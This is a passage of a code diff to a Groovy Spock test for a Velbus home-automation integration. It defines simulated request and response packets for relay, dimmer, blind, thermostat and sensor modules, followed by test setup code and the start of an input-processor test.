+        "0F FB 02 08 E8 0B FF FF FF FF FF 00 FE 04",
+        "0F FB 02 08 E9 0B FF FF FF FF FF FF FE 04"
+      ],
+
+      // VMB4AN Lock channel for 1s
+      "0F F8 02 05 12 07 00 00 01 D8 04 00 00 00": ["0F FB 02 06 ED 10 84 00 01 00 6C 04 00 00"],
+
+      // VMB4AN lock channel indefinitely
+      "0F F8 02 05 12 07 FF FF FF DC 04 00 00 00": ["0F FB 02 06 ED 10 84 00 01 00 6C 04 00 00"],
+
+
+
+      // Module Type request for address 48 - return VMBGPOD Packets
+      "0F FB 30 40 86 04 00 00 00 00 00 00 00 00": [
+        "0F FB 30 07 FF 28 00 02 01 16 12 6D 04 00",
+        "0F FB 30 08 B0 28 00 02 31 32 FF 40 42 04"
+        //"0F FB 30 08 B0 28 00 02 31 32 33 40 0E 04"
+      ],
+
+      // Module Status request for address 48
+      "0F FB 30 02 FA 00 CA 04 00 00 00 00 00 00": [
+        "0F FB 30 07 ED 00 FF FF 00 00 8D 47 04 00",
+        "0F FB 31 07 ED 00 FF FF 00 10 8D 36 04 00",
+        "0F FB 32 07 ED 00 FF FF 00 00 8D 45 04 00",
+      ],
+
+      // Module Type request for address 1 - return VMBGP1 Packets
+      "0F FB 01 40 B5 04 00 00 00 00 00 00 00 00": [
+        "0F FB 01 07 FF 1E 00 02 01 16 12 A6 04 00",
+        "0F FB 01 08 B0 1E 00 02 02 FF FF FF 1E 04"
+      ],
+
+      // Module Status request for address 1 - return
+      "0F FB 01 02 FA 00 F9 04 00 00 00 00 00 00": ["0F FB 01 07 ED 00 FF FF 00 00 00 03 04"],
+
+      // CH8 lock for 1s
+      "0F F8 30 05 12 08 00 00 01 A9 04 00 00 00": ["0F FB 30 07 ED 00 FF FF 80 00 8D C7 04 00"],
+
+      // CH8 lock indefinitely
+      "0F F8 30 05 12 08 FF FF FF AD 04 00 00 00": ["0F FB 30 07 ED 00 FF FF 80 00 8D C7 04 00"],
+
+      // CH8 unlock
+      "0F F8 30 02 13 08 AC 04 00 00 00 00 00 00": ["0F FB 30 07 ED 00 FF FF 00 00 8D 47 04 00"],
+
+      // Module Type request for address 10 - return VMB7IN
+      "0F FB 0A 40 AC 04 00 00 00 00 00 00 00 00": ["0F FB 0A 07 FF 22 E7 9C 03 15 37 F2 04 00"],
+
+      // Module status request for address 10
+      "0F FB 0A 02 FA 00 F0 04 00 00 00 00 00 00": ["0F FB 0A 07 ED 01 7F FF 00 00 C0 B9 04 00"],
+
+      /*
+       * THERMOSTAT PROCESSOR PACKETS
+       */
+      // Module Type request for address 3 - return VMBGP1 Packets with disabled thermostat
+      "0F FB 03 40 B3 04 00 00 00 00 00 00 00 00": [
+        "0F FB 03 07 FF 1E 00 02 01 16 12 A4 04 00",
+        "0F FB 03 08 B0 1E 00 02 FF FF FF FF 1F 04"
+      ],
+
+      // Thermostat Status request for address 48
+      "0F FB 30 02 E7 00 DD 04 00 00 00 00 00 00": [
+        "0F FB 30 08 EA 00 00 10 38 18 00 00 74 04",
+        "0F FB 30 08 E8 18 32 2C 20 18 06 01 21 04",
+        "0F FB 30 08 E9 2A 2E 34 48 00 3C 05 C0 04"
+      ],
+
+      // Set temperature of Heat Night mode to 20.5
+      "0F FB 30 03 E4 03 29 B3 04 00 00 00 00 00": [
+        "0F FB 30 08 EA 00 00 10 38 18 00 00 74 04",
+        "0F FB 30 08 E8 18 32 2C 29 18 06 01 18 04",
+        "0F FB 30 08 E9 2A 2E 34 48 00 3C 05 C0 04"
+      ],
+
+      // Set thermostat disabled state
+      "0F F8 30 05 12 21 FF FF FF 94 04 00 00 00": ["0F FB 30 08 EA 06 00 10 38 18 00 00 6E 04"],
+
+      // Unlock thermostat
+      "0F F8 30 02 13 21 93 04 00 00 00 00 00 00": ["0F FB 30 08 EA 00 00 10 38 18 00 00 74 04"],
+
+      // Set thermostat manual state (HEAT_SAFE)
+      "0F FB 30 03 DE FF FF E7 04 00 00 00 00 00": ["0F FB 30 08 EA 02 00 10 38 18 00 00 72 04"],
+
+      // Set to normal mode (HEAT_SAFE)
+      "0F FB 30 03 DE 00 00 E5 04 00 00 00 00 00": ["0F FB 30 08 EA 00 00 10 38 18 00 00 74 04"],
+
+      // Set to HEAT_COMFORT mode 1 min
+      "0F FB 30 03 DB 00 01 E7 04 00 00 00 00 00": ["0F FB 30 08 EA 44 00 10 38 32 00 01 15 04"],
+
+      // Set thermostat manual state (HEAT_COMFORT)
+      "0F FB 30 03 DB FF FF EA 04 00 00 00 00 00": ["0F FB 30 08 EA 42 00 10 37 32 00 00 19 04"],
+
+      // Set to HEAT SAFE until next program step
+      "0F FB 30 03 DE FF 00 E6 04 00 00 00 00 00": ["0F FB 30 08 EA 00 00 10 38 18 00 00 74 04"],
+
+      // Set to normal mode (HEAT_COMFORT)
+      "0F FB 30 03 DB 00 00 E8 04 00 00 00 00 00": ["0F FB 30 08 EA 40 00 10 37 32 00 00 1B 04"],
+
+      // Set to COOL_DAY mode until next program step
+      "0F FB 30 03 DC FF 00 E8 04 00 00 00 00 00": ["0F FB 30 08 EA A0 00 10 37 2E 00 00 BF 04"],
+
+      /*
+       * PROGRAMS PROCESSOR PACKETS
+       */
+
+      // Read memory block (alarm1 times)
+      "0F FB 30 03 C9 02 85 73 04 00 00 00 00 00": ["0F FB 30 07 CC 02 85 10 00 16 00 46 04 00"],
+
+      // Read memory block (alarm2 times)
+      "0F FB 30 03 C9 02 89 6F 04 00 00 00 00 00": ["0F FB 30 07 CC 02 89 08 00 17 00 49 04 00"],
+
+      // Set alarm1 disabled
+      "0F FB 00 07 C3 01 10 00 16 00 00 05 04 00": [
+        "0F FB 30 07 ED 00 FF FF 00 00 89 4B 04 00",
+        "0F FB 31 07 ED 00 FF FF 00 10 89 3A 04 00",
+        "0F FB 32 07 ED 00 FF FF 00 00 89 49 04 00",
+        "0F FB 33 07 ED 00 FF FF 00 00 89 48 04 00"
+      ],
+
+      // Set alarm2 enabled
+      "0F FB 30 07 C3 02 08 00 17 00 01 DA 04 00": [
+        "0F FB 30 07 ED 00 FF FF 00 00 99 3B 04 00",
+        "0F FB 31 07 ED 00 FF FF 00 10 99 2A 04 00",
+        "0F FB 32 07 ED 00 FF FF 00 00 99 39 04 00",
+        "0F FB 33 07 ED 00 FF FF 00 00 99 38 04 00"
+      ],
+
+      // Set sunrise enabled
+      "0F FB 30 03 AE FF 03 13 04 00 00 00 00 00": [
+        "0F FB 30 07 ED 00 FF FF 00 00 D9 FB 04 00",
+        "0F FB 31 07 ED 00 FF FF 00 10 D9 EA 04 00",
+        "0F FB 32 07 ED 00 FF FF 00 00 D9 F9 04 00",
+        "0F FB 33 07 ED 00 FF FF 00 00 D9 F8 04 00"
+      ],
+
+      // Set sunset disabled
+      "0F FB 30 03 AE FF 01 15 04 00 00 00 00 00": [
+        "0F FB 30 07 ED 00 FF FF 00 00 59 7B 04 00",
+        "0F FB 31 07 ED 00 FF FF 00 10 59 6A 04 00",
+        "0F FB 32 07 ED 00 FF FF 00 00 59 79 04 00",
+        "0F FB 33 07 ED 00 FF FF 00 00 59 78 04 00"
+      ],
+
+      // Enable program steps CH13
+      "0F FB 30 02 B2 0D 05 04 00 00 00 00 00 00": [
+        "0F FB 30 07 ED 00 FF FF 00 00 99 3B 04 00",
+        "0F FB 31 07 ED 00 FF FF 00 00 99 3A 04 00",
+        "0F FB 32 07 ED 00 FF FF 00 00 99 39 04 00",
+        "0F FB 33 07 ED 00 FF FF 00 00 99 38 04 00"
+      ],
+
+      // Disable program steps all channels for 1s
+      "0F FB 30 05 B1 FF 00 00 01 10 04 00 00 00": [
+        "0F FB 30 07 ED 00 FF FF 00 FF 99 3C 04 00",
+        "0F FB 31 07 ED 00 FF FF 00 FF 99 3B 04 00",
+        "0F FB 32 07 ED 00 FF FF 00 FF 99 3A 04 00",
+        "0F FB 33 07 ED 00 FF FF 00 FF 99 39 04 00"
+      ],
+
+      // Disable CH20 program steps for 1s
+      "0F FB 30 05 B1 14 00 00 01 FB 04 00 00 00": [
+        "0F FB 30 07 ED 00 FF FF 00 00 99 3B 04 00",
+        "0F FB 31 07 ED 00 FF FF 00 00 99 3A 04 00",
+        "0F FB 32 07 ED 00 FF FF 00 08 99 31 04 00",
+        "0F FB 33 07 ED 00 FF FF 00 00 99 38 04 00"
+      ],
+
+      // Select winter program
+      "0F FB 30 02 B3 02 0F 04 00 00 00 00 00 00": [
+        "0F FB 30 07 ED 00 FF FF 00 00 5A 7A 04 00",
+        "0F FB 31 07 ED 00 FF FF 00 00 5A 79 04 00",
+        "0F FB 32 07 ED 00 FF FF 00 00 5A 78 04 00",
+        "0F FB 33 07 ED 00 FF FF 00 00 5A 77 04 00"
+      ],
+
+      /*
+       * RELAY PROCESSOR PACKETS
+       */
+
+      // Module Type request for address 81 - return VMB1RYNO Packets
+      "0F FB 51 40 65 04 00 00 00 00 00 00 00 00": ["0F FB 51 07 FF 1B E1 74 00 13 25 F7 04 00"],
+
+      // Relay Status request for address 81
+      "0F FB 51 02 FA 1F 8A 04 00 00 00 00 00 00": [
+        "0F FB 51 08 FB 01 00 00 00 00 00 00 A1 04",
+        "0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04",
+        "0F FB 51 08 FB 04 00 00 00 00 00 00 9E 04",
+        "0F FB 51 08 FB 08 00 00 00 00 00 00 9A 04",
+        "0F FB 51 08 FB 10 00 00 00 00 00 00 92 04"
+      ],
+
+      // Switch on CH4 relay
+      "0F F8 51 02 02 08 9C 04 00 00 00 00 00 00": ["0F FB 51 08 FB 08 00 01 80 00 00 00 19 04"],
+
+      // Switch off CH4 relay
+      "0F F8 51 02 01 08 9D 04 00 00 00 00 00 00": ["0F FB 51 08 FB 08 00 00 00 00 00 00 9A 04"],
+
+      // Switch CH1 to intermittent
+      "0F F8 51 05 0D 01 FF FF FF 98 04 00 00 00": [
+        "0F FB 51 08 FB 01 00 03 20 FF FF FE 82 04",
+        "0F FB 40 02 F8 01 BB 04 00 00 00 00 00 00",
+        "0F F8 51 04 00 01 00 00 A3 04 00 00 00"
+      ],
+
+      // Switch CH1 off
+      "0F F8 51 02 01 01 A4 04 00 00 00 00 00 00": [
+        "0F FB 40 02 F5 01 BE 04 00 00 00 00 00 00",
+        "0F FB 51 08 FB 01 00 00 00 00 00 00 A1 04",
+        "0F F8 51 04 00 00 01 00 A3 04 00 00 00 00"
+      ],
+
+      // CH2 to intermittent for 1s
+      "0F F8 51 05 0D 02 00 00 01 93 04 00 00 00": [
+        "0F FB 51 08 FB 02 00 03 20 00 00 01 7C 04",
+        "0F F8 51 04 00 02 00 00 A2 04 00 00 00"
+      ],
+
+      // CH2 to intermittent indefinitely
+      "0F F8 51 05 0D 02 FF FF FF 97 04 00 00 00": [
+        "0F FB 51 08 FB 02 00 03 20 00 00 00 7D 04",
+        "0F F8 51 04 00 02 00 00 A2 04 00 00 00",
+      ],
+
+      // CH2 off
+      "0F F8 51 02 01 02 A3 04 00 00 00 00 00 00": ["0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"],
+
+      // Inhibit channel 2 for 1s
+      "0F F8 51 05 16 02 00 00 01 8A 04 00 00 00": ["0F FB 51 08 FB 02 01 00 00 00 00 00 9F 04"],
+
+      // Inhibit channel 2 indefinitely
+      "0F F8 51 05 16 02 FF FF FF 8E 04 00 00 00": ["0F FB 51 08 FB 02 01 00 00 00 00 00 9F 04"],
+
+      // Cancel channel 2 inhibit
+      "0F F8 51 02 17 02 8D 04 00 00 00 00 ": ["0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"],
+
+      // Force channel 3 on for 1s
+      "0F F8 51 05 14 04 00 00 01 8A 04 00 00 00": [
+        "0F FB 30 02 F6 02 CC 04 00 00 00 00 00 00",
+        "0F FB 51 08 FB 04 02 01 80 00 00 00 1B 04",
+        "0F F8 51 04 00 04 00 00 A0 04 00 00 00 00"
+      ],
+
+      // Force channel 1 off for 1s
+      "0F F8 51 05 12 01 00 00 01 8F 04 00 00 00": [
+        "0F FB 51 08 FB 01 03 00 00 00 00 00 9E 04",
+        "0F FB 40 02 F5 01 BE 04 00 00 00 00 00 00"
+      ],
+
+      // Channel 1 on for 1s
+      "0F F8 51 05 03 01 00 00 01 9E 04 00 00 00": [
+        "0F FB 40 02 F8 01 BB 04 00 00 00 00 00 00",
+        "0F FB 51 08 FB 01 00 01 20 00 00 01 7F 04",
+        "0F F8 51 04 00 01 00 00 A3 04 00 00 00 00"
+      ],
+
+      // Channel 1 on indefinitely
+      "0F F8 51 05 03 01 FF FF FF A2 04 00 00 00": [
+        "0F FB 40 02 F6 01 BD 04 00 00 00 00 00 00",
+        "0F FB 51 08 FB 01 00 01 80 00 00 00 20 04",
+        "0F F8 51 04 00 01 00 00 A3 04 00 00 00 00"
+      ],
+
+      // CH2 lock for 1s
+      "0F F8 51 05 12 02 00 00 01 8E 04 00 00 00": ["0F FB 51 08 FB 02 03 00 00 00 00 00 9D 04"],
+
+      // CH2 lock indefinitely
+      "0F F8 51 05 12 02 FF FF FF 92 04 00 00 00": ["0F FB 51 08 FB 02 03 00 00 00 00 00 9D 04"],
+
+      // CH2 lock cancel
+      "0F F8 51 02 13 02 91 04 00 00 00 00 00 00": ["0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"],
+
+      /*
+       * COUNTER PROCESSOR PACKETS
+       */
+
+      // Read memory from address 10 (counter data)
+      "0F FB 0A 03 FD 03 FE EB 04 00 00 00 00 00": ["0F FB 0A 04 FE 03 FE FD EC 04 00 00 00 00"],
+
+      // Counter status
+      "0F FB 0A 03 BD 0F 00 1D 04 00 00 00 00 00": [
+        "0F FB 0A 08 BE 68 00 00 00 00 FF FF C0 04",
+        "0F FB 0A 08 BE 11 00 00 00 00 FF FF 17 04"
+      ],
+
+      // Counter 1 reset
+      "0F FB 0A 02 AD 00 3D 04 00 00 00 00 00 00": ["0F FB 0A 08 BE 68 00 00 00 00 FF FF C0 04"],
+
+      /*
+       * DIMMER PROCESSOR PACKETS
+       */
+
+      // Module Type request for address 187 - return VMB4DC Packets
+      "0F FB BB 40 FB 04 00 00 00 00 00 00 00 00": ["0F FB BB 07 FF 12 AB 31 03 15 09 26 04 00"],
+
+      // Dimmer Status request for address 187
+      "0F FB BB 02 FA 0F 30 04 00 00 00 00 00 00": [
+        "0F FB BB 08 B8 01 00 00 00 00 00 00 7A 04",
+        "0F FB BB 08 B8 02 00 00 00 00 00 00 79 04",
+        "0F FB BB 08 B8 04 00 00 00 00 00 00 77 04",
+        "0F FB BB 08 B8 08 00 00 00 00 00 00 73 04"
+      ],
+
+      // Switch dimmer channel on
+      "0F F8 BB 05 07 08 64 00 00 C6 04 00 00 00": [
+        "0F FB BB 08 B8 08 00 00 20 00 00 00 53 04",
+        "0F F8 BB 04 00 08 00 00 32 04 00 00 00 00",
+        "0F FB BB 08 B8 08 00 64 80 00 00 00 8F 04"
+      ],
+
+      // Switch dimmer channel off
+      "0F F8 BB 05 07 08 00 00 00 2A 04 00 00 00": [
+        "0F FB BB 08 B8 08 00 63 80 00 00 00 90 04",
+        "0F F8 BB 04 00 00 08 00 32 04 00 00 00 00",
+        "0F FB BB 08 B8 08 00 00 00 00 00 00 73 04"
+      ],
+
+      // Set dimmer to 50%
+      "0F F8 BB 05 07 08 32 00 00 F8 04 00 00 00": [
+        "0F FB BB 08 B8 08 00 00 20 00 00 00 53 04",
+        "0F F8 BB 04 00 08 00 00 32 04 00 00 00 00",
+        "0F FB BB 08 B8 08 00 32 80 00 00 00 C1 04"
+      ],
+
+      // Set dimmer to last level (50%)
+      "0F F8 BB 05 11 08 00 00 00 20 04 00 00 00": [
+        "0F FB BB 08 B8 08 00 01 00 00 00 00 72 04",
+        "0F F8 BB 04 00 08 00 00 32 04 00 00 00 00",
+        "0F FB BB 08 B8 08 00 32 80 00 00 00 C1 04"
+      ],
+
+      // Set dimmer to 75% over 7s
+      "0F F8 BB 05 07 02 4B 00 07 DE 04 00 00 00": [
+        "0F FB BB 08 B8 02 00 00 00 00 00 00 79 04",
+        "0F F8 BB 04 00 02 00 00 38 04 00 00 00 00",
+        "0F FB BB 08 B8 02 00 1A 20 00 00 00 3F 04",
+        "0F FB BB 08 B8 02 00 33 20 00 00 00 26 04",
+        "0F FB BB 08 B8 02 00 4B 80 00 00 00 AE 04"
+      ],
+
+      // CH2 off
+      "0F F8 BB 05 07 02 00 00 00 30 04 00 00 00": [
+        "0F FB BB 08 B8 02 00 4B 80 00 00 00 AE 04",
+        "0F F8 BB 04 00 00 02 00 38 04 00 00 00 00",
+        "0F FB BB 08 B8 02 00 00 00 00 00 00 79 04"
+      ],
+
+      // CH2 on
+      "0F F8 BB 05 07 02 64 00 00 CC 04 00 00 00": [
+        "0F FB BB 08 B8 02 00 01 20 00 00 00 58 04",
+        "0F F8 BB 04 00 02 00 00 38 04 00 00 00 00",
+        "0F FB BB 08 B8 02 00 08 20 00 00 03 4E 04"
+      ],
+
+      // CH2 on for 3s
+      "0F F8 BB 05 08 02 00 00 03 2C 04 00 00 00": ["0F FB BB 08 B8 02 00 08 20 00 00 03 4E 04"],
+
+      // CH2 to 50% over 60s
+      "0F F8 BB 05 07 02 32 00 3C C2 04 00 00 00": [
+        "0F FB BB 08 B8 02 00 00 20 00 00 00 59 04",
+        "0F F8 BB 04 00 02 00 00 38 04 00 00 00 00",
+        "0F FB BB 08 B8 02 00 15 20 00 00 00 44 04"
+      ],
+
+      // CH2 halt
+      "0F F8 BB 02 10 02 2A 04 00 00 00 00 00 00": ["0F FB BB 08 B8 02 00 02 80 00 00 00 F7 04"],
+
+      // CH3 inhibit for 1s
+      "0F F8 BB 05 16 04 00 00 01 1E 04 00 00 00": ["0F FB BB 08 B8 04 01 00 00 00 00 00 76 04"],
+
+      // CH3 inhibit indefinitely
+      "0F F8 BB 05 16 04 FF FF FF 22 04 00 00 00": ["0F FB BB 08 B8 04 01 00 00 00 00 00 76 04"],
+
+      // CH3 inhibit cancel
+      "0F F8 BB 02 17 04 21 04 00 00 00 00 00 00": ["0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"],
+
+      // CH3 force on 5s
+      "0F F8 BB 05 14 04 00 00 05 1C 04 00 00 00": [
+        "0F F8 BB 04 00 04 00 00 36 04 00 00 00 00",
+        "0F FB BB 08 B8 04 02 64 80 00 00 00 91 04"
+      ],
+
+      // CH3 on
+      "0F F8 BB 05 07 04 64 00 00 CA 04 00 00 00": [
+        "0F FB BB 08 B8 04 00 00 00 00 00 00 77 04",
+        "0F FB BB 08 B8 04 00 00 20 00 00 00 57 04",
+        "0F F8 BB 04 00 04 00 00 36 04 00 00 00 00"
+      ],
+
+      // CH3 on indefinitely
+      "0F F8 BB 05 08 04 FF FF FF 30 04 00 00 00": ["0F FB BB 08 B8 04 00 64 80 00 00 00 93 04"],
+
+      // CH3 off
+      "0F F8 BB 05 07 04 00 00 00 2E 04 00 00 00": [
+        "0F FB BB 08 B8 04 00 63 80 00 00 00 94 04",
+        "0F F8 BB 04 00 00 04 00 36 04 00 00 00 00",
+        "0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"
+      ],
+
+      // CH3 lock for 1s
+      "0F F8 BB 05 12 04 00 00 01 22 04 00 00 00": [
+        "0F FB BB 08 B8 04 00 00 00 00 00 00 77 04",
+        "0F FB BB 08 B8 04 03 00 00 00 00 00 74 04"
+      ],
+
+      // CH3 lock indefinitely
+      "0F F8 BB 05 12 04 FF FF FF 26 04 00 00 00": ["0F FB BB 08 B8 04 03 00 00 00 00 00 74 04"],
+
+      // CH3 lock cancel
+      "0F F8 BB 02 13 04 25 04 00 00 00 00 00 00": ["0F FB BB 08 B8 04 00 00 00 00 00 00 77 04"],
+
+      /*
+       * BLIND PROCESSOR PACKETS
+       */
+
+      // Module Type request for address 97 - return VMB2BLE Packets
+      "0F FB 61 40 55 04 00 00 00 00 00 00 00 00": ["0F FB 61 07 FF 1D C4 56 00 13 25 20 04 00"],
+
+      // CH1 status request
+      "0F FB 61 02 FA 01 98 04 00 00 00 00 00 00": ["0F FB 61 08 EC 01 08 00 00 00 00 00 98 04"],
+
+      // CH2 status request
+      "0F FB 61 02 FA 02 97 04 00 00 00 00 00 00": ["0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"],
+
+      // CH2 down
+      "0F F8 61 05 06 02 00 00 00 8B 04 00 00 00": [
+        "0F FB 61 08 EC 02 09 02 20 00 00 00 74 04",
+        "0F F8 61 04 00 08 00 00 8C 04 00 00 00 00"
+      ],
+
+      // CH2 up
+      "0F F8 61 05 05 02 00 00 00 8C 04 00 00 00": [
+        "0F FB 61 08 EC 02 09 01 02 64 00 00 2F 04",
+        "0F F8 61 04 00 04 00 00 90 04 00 00 00 00"
+      ],
+
+      // CH2 50%
+      "0F F8 61 03 1C 02 32 45 04 00 00 00 00 00": [
+        "0F FB 61 08 EC 02 09 02 20 00 00 00 74 04",
+        "0F F8 61 04 00 08 00 00 8C 04 00 00 00 00"
+      ],
+
+      // CH2 up for 10s
+      "0F F8 61 05 05 02 00 00 0A 82 04 00 00 00": [
+        "0F FB 61 08 EC 02 09 00 02 32 00 00 62 04",
+        "0F FB 61 08 EC 02 09 01 02 32 00 00 61 04",
+        "0F F8 61 04 00 04 00 00 90 04 00 00 00 00"
+      ],
+
+      // CH2 down for 15s
+      "0F F8 61 05 06 02 00 00 0F 7C 04 00 00 00": [
+        "0F FB 61 08 EC 02 09 00 20 00 00 00 76 04",
+        "0F FB 61 08 EC 02 09 02 20 00 00 00 74 04",
+        "0F F8 61 04 00 08 00 00 8C 04 00 00 00 00"
+      ],
+
+      // CH2 halt
+      "0F F8 61 02 04 02 90 04 00 00 00 00 00 00": [
+        "0F FB 61 08 EC 02 09 00 00 63 00 00 33 04",
+        "0F F8 61 04 00 00 04 00 90 04 00 00 00 00",
+      ],
+
+      // CH2 inhibit 1s
+      "0F F8 61 05 16 02 00 00 01 7A 04 00 00 00": [
+        "0F FB 61 08 EC 02 09 00 00 63 01 00 32 04",
+        "0F F8 61 04 00 04 00 00 90 04 00 00 00 00"
+      ],
+
+      // CH2 inhibit indefinitely
+      "0F F8 61 05 16 02 FF FF FF 7E 04 00 00 00": ["0F FB 61 08 EC 02 09 00 00 00 01 00 95 04"],
+
+      // CH2 inhibit cancel
+      "0F F8 61 02 17 02 7D 04 00 00 00 00 00 00": ["0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"],
+
+      // CH2 inhibit down indefinitely
+      "0F F8 61 05 19 02 FF FF FF 7B 04 00 00 00": [
+        "0F FB 61 08 EC 02 09 00 20 00 02 00 74 04",
+        "0F FB 61 08 EC 02 09 02 20 00 02 00 72 04",
+        "0F F8 61 04 00 08 00 00 8C 04 00 00 00 00",
+        "0F FB 61 08 EC 02 09 00 00 64 02 00 30 04",
+        "0F F8 61 04 00 00 08 00 8C 04 00 00 00 00"
+      ],
+
+      // CH2 force up for 5s
+      "0F F8 61 05 12 02 00 00 05 7A 04 00 00 00": [
+        "0F FB 61 08 EC 02 09 00 02 64 05 00 2B 04",
+        "0F FB 61 08 EC 02 09 01 02 64 05 00 2A 04",
+        "0F F8 61 04 00 04 00 00 90 04 00 00 00 00"
+      ],
+
+      // CH2 locked for 1s
+      "0F F8 61 05 1A 02 00 00 01 76 04 00 00 00": ["0F FB 61 08 EC 02 09 00 00 00 06 00 90 04"],
+
+      // CH2 locked indefinitely
+      "0F F8 61 05 1A 02 FF FF FF 7A 04 00 00 00": ["0F FB 61 08 EC 02 09 00 00 00 06 00 90 04"],
+
+      // CH2 lock cancel
+      "0F F8 61 02 1B 02 79 04 00 00 00 00 00 00": ["0F FB 61 08 EC 02 09 00 00 00 00 00 96 04"],
+
+      /*
+       * METEO PROCESSOR PACKETS
+       */
+
+      // Module type request address 254 (VMBMETEO)
+      "0F FB FE 40 B8 04 00 00 00 00 00 00 00 00": ["0F FB FE 07 FF 31 E7 6C 01 16 26 31 04 00"],
+
+      // Input status
+      "0F FB FE 02 FA 00 FC 04 00 00 00 00 00 00": ["0F FB FE 07 ED 02 00 00 FD 0A 00 FB 04 00"],
+
+      // Meteo status
+      "0F FB FE 03 E5 0F 00 01 04 00 00 00 00 00": [
+        "0F FB FE 07 A9 00 00 36 E5 00 00 2D 04 00",
+        "0F FB FE 07 E6 2C 6F FE E3 57 E5 53 04 00"
+      ],
+
+      // Programs memory read
+      "0F FB FE 03 C9 00 84 A8 04 00 00 00 00 00": [
+        "0F FB FE 07 CC 00 84 06 0F 16 00 76 04 00",
+        "0F FB FE 07 CC 00 88 08 1E 16 1E 43 04 00"
+      ],
+
+      /*
+       * VMBPIRO PACKETS
+       */
+
+      // Module type request address 8 (VMBPIRO)
+      "0F FB 08 40 AE 04 00 00 00 00 00 00 00 00": ["0F FB 08 07 FF 2C 14 05 01 15 19 74 04 00"],
+
+      // Input status
+      "0F FB 08 02 FA 00 F2 04 00 00 00 00 00 00": [
+        "0F FB 08 08 ED 02 02 40 00 00 C0 01 F4 04",
+        "0F FB 08 07 E6 3B 40 28 00 3B 60 C3 04 00"
+      ],
+
+      // Programs memory read alarm 1
+      "0F FB 08 03 C9 00 32 F0 04 00 00 00 00 00": ["0F FB 08 07 CC 00 32 07 00 16 00 CC 04 00"],
+
+      // Programs memory read alarm 2
+      "0F FB 08 03 C9 00 36 EC 04 00 00 00 00 00": ["0F FB 08 07 CC 00 36 08 00 17 00 C6 04 00"],
+
+      /*
+       * VMB1TS PACKETS
+       */
+
+      // Module type request address 5 (VMB1TS)
+      "0F FB 05 40 B1 04 00 00 00 00 00 00 00 00": ["0F FB 05 08 FF 0C 00 38 DD 01 12 47 6F 04"],
+
+      // Input status
+      "0F FB 05 02 FA 00 F5 04 00 00 00 00 00 00": ["0F FB 05 08 EA 00 00 40 3B 0A 00 00 7A 04"],
+
+      // Current Temp status
+      "0F FB 05 02 E5 00 0A 04 00 00 00 00 00 00": ["0F FB 05 07 E6 3B C0 26 A0 3C 80 87 04 00"],
+
+      // Temp status
+      "0F FB 05 02 E7 00 08 04 00 00 00 00 00 00": [
+        "0F FB 05 08 E8 0A 2C 28 1E 0A 06 01 74 04",
+        "0F FB 05 08 E9 2A 2E 34 48 00 3C 00 F0 04"
+      ]
+    ]
+  }
+
+  static writeDelayMillis = VelbusNetwork.DELAY_BETWEEN_PACKET_WRITES_MILLISECONDS
+  static timeoutMillis = VelbusDevice.INITIALISATION_TIMEOUT_MILLISECONDS
+
+  def setupSpec() {
+    // Minimal delays for simulated network
+    VelbusNetwork.DELAY_BETWEEN_PACKET_WRITES_MILLISECONDS = 10
+    VelbusDevice.INITIALISATION_TIMEOUT_MILLISECONDS = 10
+    // Uncomment and configure the below lines to communicate with an actual VELBUS network
+    //        def client = new VelbusSocketMessageProcessor("192.168.0.65", 6000);
+    //        VelbusNetwork.DELAY_BETWEEN_PACKET_WRITES_MILLISECONDS = 100;
+    //        def client = new VelbusSerialMessageProcessor("COM6", 38400);
+    //        VelbusNetwork.DELAY_BETWEEN_PACKET_WRITES_MILLISECONDS = 100;
+
+    def scheduledTasksExecutor = Executors.newScheduledThreadPool(1)
+    network = new VelbusNetwork(messageProcessor, scheduledTasksExecutor, null)
+
+    loadDevicePackets(VelbusBasicTest.messageProcessor)
+  }
+
+  def cleanupSpec() {
+    VelbusNetwork.DELAY_BETWEEN_PACKET_WRITES_MILLISECONDS = writeDelayMillis
+    VelbusDevice.INITIALISATION_TIMEOUT_MILLISECONDS = timeoutMillis
+    if (network != null) {
+      network.close()
+    }
+  }
+
+  def setup() {
+    network.connect()
+
+    conditions.eventually {
+      assert network.getConnectionStatus() == ConnectionStatus.CONNECTED
+    }
+  }
+
+  def cleanup() {
+    def counter = 0
+    while(network.messageQueue.size() > 0 && counter < 100) {
+      Thread.sleep(20)
+      counter++
+    }
+    network.disconnect()
+    network.removeAllDevices()
+  }
+
+  def "Input Button Processor Test"() {
+
+    given: "the input button processor"
+    def inputButtonProcessor = (InputProcessor)VelbusDeviceType.VMBGPOD.getFeatureProcessors().find {
+      it.getClass() == InputProcessor.class
+    }
+    VelbusDevice device = null
+
+    when: "A device property value consumer is registered for device address 2 (VMB4AN)"
+    Object ioAlarm1
+    network.addPropertyValueConsumer(2, "CH1", { newValue ->
+      ioAlarm1 = newValue
+    })
+    device = network.getDevice(2)
+
+    then: "The device should be created and become initialised"
+    conditions.eventually {
+      assert device != null
+      assert device.getDeviceType() == VelbusDeviceType.VMB4AN
+      assert device.getBaseAddress() == 2
+
+      1.upto(8, {
+        def state = (it == 5 ? InputProcessor.ChannelState.PRESSED : InputProcessor.ChannelState.RELEASED)
+        def locked = it == 3
+        assert device.getPropertyValue("CH" + it) == state
+        assert device.getPropertyValue("CH" + it + "_LOCKED") == locked
+        assert device.getPropertyValue("CH" + it + "_LED") == FeatureProcessor.LedState.OFF
+      })
     }
 
-    static writeDelayMillis = VelbusNetwork.DELAY_BETWEEN_PACKET_WRITES_MILLISECONDS
-    static timeoutMillis = VelbusDevice.INITIALISATION_TIMEOUT_MILLISECONDS
+    when: "an alarm channel is locked for 1s"
+    device.writeProperty("CH8_LOCK", 1d)
 
-    def setupSpec() {
-        // Minimal delays for simulated network
-        VelbusNetwork.DELAY_BETWEEN_PACKET_WRITES_MILLISECONDS = 10
-        VelbusDevice.INITIALISATION_TIMEOUT_MILLISECONDS = 10
-        // Uncomment and configure the below lines to communicate with an actual VELBUS network
-//        def client = new VelbusSocketMessageProcessor("192.168.0.65", 6000);
-//        VelbusNetwork.DELAY_BETWEEN_PACKET_WRITES_MILLISECONDS = 100;
-//        def client = new VelbusSerialMessageProcessor("COM6", 38400);
-//        VelbusNetwork.DELAY_BETWEEN_PACKET_WRITES_MILLISECONDS = 100;
-
